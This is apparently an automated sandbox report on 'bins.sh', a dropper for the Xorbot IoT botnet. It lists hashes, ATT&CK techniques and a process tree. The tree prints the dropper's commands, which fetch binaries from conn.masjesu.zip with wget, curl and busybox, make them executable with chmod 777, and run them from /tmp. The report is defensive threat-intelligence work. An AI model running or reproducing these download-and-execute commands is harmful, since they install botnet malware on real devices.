xorbot | 330f61b8a22a5266f4cf6af534521ba9f6bdb8f95532456ef7efec343e9b81ca

Analysis

max time kernel
150s
max time network
154s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
30-11-2024 02:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

a454322a1daf50c15bbf98f7e4481063
SHA1

7f104689164588c56c2caebfabbf11da9362fdcc
SHA256

330f61b8a22a5266f4cf6af534521ba9f6bdb8f95532456ef7efec343e9b81ca
SHA512

2c5075936f326b2fbf1f8914ba511911c7cfdac6dd95a4f046ab3e0ca0b2f7dfba884e358cd050d635a1be60b4d28942b6ec4d72d66c68586be39a85c47801b2
SSDEEP

192:xaz+mxoc2p7bORV7019NIZS+p+mxocAo7bORVw194:0z+mxoc2p7bORV7yIZSE+mxocAo7bOR9

Score

10^/10

xorbot botnet defense_evasion discovery trojan

Malware Config

Signatures

Detects Xorbot 1 IoCs

botnet trojan

Processes:

resource	yara_rule
behavioral4/files/fstream-3.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot

File and Directory Permissions Modification 1 TTPs 2 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmod

pid	Process
739	chmod
825	chmod

Executes dropped EXE 2 IoCs

Processes:

oGGGTr6G5WEemElzljRhFuqicguT1YBXDkkWoBrYudMSo9lPC8Tj32iiOr3YEVqJ1GNx

ioc	pid	Process
/tmp/oGGGTr6G5WEemElzljRhFuqicguT1YBXDk	740	oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
/tmp/kWoBrYudMSo9lPC8Tj32iiOr3YEVqJ1GNx	826	kWoBrYudMSo9lPC8Tj32iiOr3YEVqJ1GNx

Reads runtime system information 2 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

curlcurl

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 7 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

Processes:

busyboxwgetcurlbusyboxwgetwgetcurl

pid	Process
738	busybox
743	wget
744	curl
824	busybox
829	wget
711	wget
731	curl

Writes file to tmp directory 6 IoCs

Malware often drops required files in the /tmp directory.

Processes:

wgetcurlbusyboxwgetcurlbusybox

description	ioc	Process
File opened for modification	/tmp/kWoBrYudMSo9lPC8Tj32iiOr3YEVqJ1GNx	wget
File opened for modification	/tmp/kWoBrYudMSo9lPC8Tj32iiOr3YEVqJ1GNx	curl
File opened for modification	/tmp/kWoBrYudMSo9lPC8Tj32iiOr3YEVqJ1GNx	busybox
File opened for modification	/tmp/oGGGTr6G5WEemElzljRhFuqicguT1YBXDk	wget
File opened for modification	/tmp/oGGGTr6G5WEemElzljRhFuqicguT1YBXDk	curl
File opened for modification	/tmp/oGGGTr6G5WEemElzljRhFuqicguT1YBXDk	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:706
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:708
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:711
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:731
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:738
- /bin/chmod
  chmod 777 oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
  2⤵
  - File and Directory Permissions Modification
  PID:739
- /tmp/oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
  ./oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
  2⤵
  - Executes dropped EXE
  PID:740
- /bin/rm
  rm oGGGTr6G5WEemElzljRhFuqicguT1YBXDk
  2⤵
  PID:742
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/kWoBrYudMSo9lPC8Tj32iiOr3YEVqJ1GNx
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:743
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/kWoBrYudMSo9lPC8Tj32iiOr3YEVqJ1GNx
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:744
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/kWoBrYudMSo9lPC8Tj32iiOr3YEVqJ1GNx
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:824
- /bin/chmod
  chmod 777 kWoBrYudMSo9lPC8Tj32iiOr3YEVqJ1GNx
  2⤵
  - File and Directory Permissions Modification
  PID:825
- /tmp/kWoBrYudMSo9lPC8Tj32iiOr3YEVqJ1GNx
  ./kWoBrYudMSo9lPC8Tj32iiOr3YEVqJ1GNx
  2⤵
  - Executes dropped EXE
  PID:826
- /bin/rm
  rm kWoBrYudMSo9lPC8Tj32iiOr3YEVqJ1GNx
  2⤵
  PID:828
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/9NvGxvrwezPMVyG7adNGLsaK188LzscFDp
  2⤵
  - System Network Configuration Discovery
  PID:829

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/kWoBrYudMSo9lPC8Tj32iiOr3YEVqJ1GNx

Filesize
117KB

MD5
849fa04ef88a8e8de32cb2e8538de5fe

SHA1
c768af29fe4b6695fff1541623e8bbd1c6f242f7

SHA256
8bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579

SHA512
2d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf

Download Submit
/tmp/oGGGTr6G5WEemElzljRhFuqicguT1YBXDk

Filesize
151KB

MD5
3c90d5820bddcf7c5d1bd21dfa49d958

SHA1
5ba05bd489e50af97d6dc45e3a0be60e494d5083

SHA256
bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2

SHA512
54a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a

Download Submit